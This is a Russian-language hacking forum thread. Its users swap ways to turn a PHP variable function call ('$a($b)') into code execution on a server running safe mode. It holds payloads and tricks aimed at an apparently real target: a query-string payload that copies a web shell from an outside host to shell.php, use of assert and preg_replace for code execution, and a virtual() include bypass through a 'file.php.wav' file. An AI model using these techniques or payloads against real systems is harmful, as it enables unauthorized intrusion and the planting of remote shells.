точнее взлом с помощью 2 переменных) возможно ли?) PHP: $lol=$a($b); соответственно $a и $b можно подставить свои system,exec не катят) readfile работает,но толку от чтения файлов нет)
Это не функция, а языковая конструкция PHP: $a = array('include', 'require', 'eval'); var_dump(array_map('function_exists', $a)); ps: вопрос весьма интересный, перерываю php.net UPD: первая идея. Ограничения: должен быть установлен коннект к базе и у пользователя бд должны быть File priv Функция - mysql_query, параметр
eval, system, exec и некоторые другие в случае ТСа не пашут. Проверял. copy требует 2 параметра, но есть только 1. функция не будет вызвана. Читай внимательнее
благодаря PHP: $a=phpinfo; $b=-1; выяснилось что на серве safe mode - ON ) потому все "вкусные" функции не пашут)
А так ? site.ru/script.php?1=http://xaker.ru/shell.txt&2=shell.php&a=copy&b=$_GET[1],$_GET[2] не работает, такая конуструкция почему то( проверил щас на тестовом скрипте... Но по идее можно изгальнутся и придумать что то)
уже давно пора забить на всякие *exec - туфта все assert и все дела ) это если один аргумент $b, если можно два - то ченить с коллбеком, если три - то preg_replace.
вообщем помогла virtual() причем инклюд лоальных файлов file.wav не канал ,а вот file.php.wav заработал))) п.с. : интересная функция ассерт ) бум знать на будущее)))))
если сработала virtual(), то можно было с таким же успехом просто напрямую обратится к твоему file.php.wav.
